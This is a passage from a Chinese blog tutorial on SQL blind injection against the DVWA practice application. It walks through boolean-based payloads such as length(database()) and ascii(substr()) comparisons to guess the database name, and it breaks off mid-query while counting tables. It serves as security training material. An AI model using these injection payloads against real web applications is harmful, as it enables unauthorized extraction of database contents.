基于dvwa的sql盲注(Blind)-低中高

本文详细介绍了如何在DVWA中进行SQL盲注,从低、中、高三个级别逐步讲解。通过布尔盲注和时间盲注技术,包括猜测数据库名、表名、列名及数据,展示了SQL注入的过程和技巧。
摘要由CSDN通过智能技术生成

sql盲注和sql注入的区别

		盲注:目标只会回复是或不是,没有详细内容
		注入:可以查看到详细内容
	盲注分为:布尔盲注、时间盲注

sql盲注过程

		1、判断是否存在注入,注入是字符型还是数字型
		2、猜解当前数据库名(猜解数据库长度->猜数据库名称)
		3、猜解数据库中的表名(猜表的数量->猜表的长度->猜表的名称)
		4、猜解表中的列(猜列的数量->猜列的长度->猜列的名称)
		5、猜解数据

dvwa-SQL Injection (Blind) low级别

下面分别用布尔盲注、时间盲注进行注入

布尔盲注

猜数据库长度:
输入1’ and length(database())=1# 显示 MISSING 说明数据库长度不为1
在这里插入图片描述
输入1’ and length(database())=4# 显示 exists 说明数据库长度为4
在这里插入图片描述
猜数据库名:
输入1’ and ascii(substr(database(),1,1))>97# 显示 exists 说明数据库的第一个字母的ASCII值>97
ascii()函数是将字母转换为ASCII值
在这里插入图片描述
附加:放一张substr()函数的解释
在这里插入图片描述
可以用二分法去猜ASCII值

输入1’ and ascii(substr(database(),1,1))>100#显示MISSING说明第一个字母的ASCII不大于100
在这里插入图片描述
输入1’ and ascii(substr(database(),1,1))<100#也显示MISSING说明第一个字母的ASCII也不小于100,那就是等于100
在这里插入图片描述
输入1’ and ascii(substr(database(),1,1))=100#,显示exists,说明第一个字母就是 d
盲注全靠猜,后三个字母可以自己尝试去猜,步骤如上
最后猜到数据库名为dvwa

猜表的数量:
输入1’and (select count(table_name)from information_schema.tables where table_schema&

  • 4
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA(Damn Vulnerable Web Application)是一个用于练习 Web 安全技术的漏洞应用程序。其中包含了多个不同类型的漏洞,包括 SQL 盲注SQL 盲注是一种利用 Web 应用程序中存在的 SQL 注入漏洞来获取数据库信息的攻击技术。在 DVWA 中,你可以通过以下步骤进行 SQL 盲注级练习: 1. 登录 DVWA:在浏览器中访问 DVWA,并使用提供的用户名和密码登录。 2. 寻找 SQL 注入点:在 DVWA 中,你需要找到存在 SQL 注入漏洞的输入点。这可以是登录表单、搜索框或其他用户输入的地方。 3. 确定数据库和表名:使用不正确的输入来尝试触发错误,并尝试从错误消息中获取有关数据库和表名的信息。这可以帮助你构建有效的注入语句。 4. 构造注入语句:根据你获取到的数据库和表名信息,构造有效的注入语句。在盲注中,你可能需要使用一些技巧来绕过过滤和限制。 5. 判断注入结果:通过观察应用程序的响应,判断你的注入语句是否成功执行。你可以观察页面内容、错误消息或应用程序的行为变化。 6. 提取数据:如果注入成功执行,你可以使用 UNION SELECT 或其他技术来提取数据库中的数据。通过逐渐调整注入语句,你可以获取更多敏感信息。 请注意,在进行 DVWA 或任何其他漏洞练习时,遵守法律和道德规范。仅在授权的环境中进行测试,不要攻击未经授权的系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值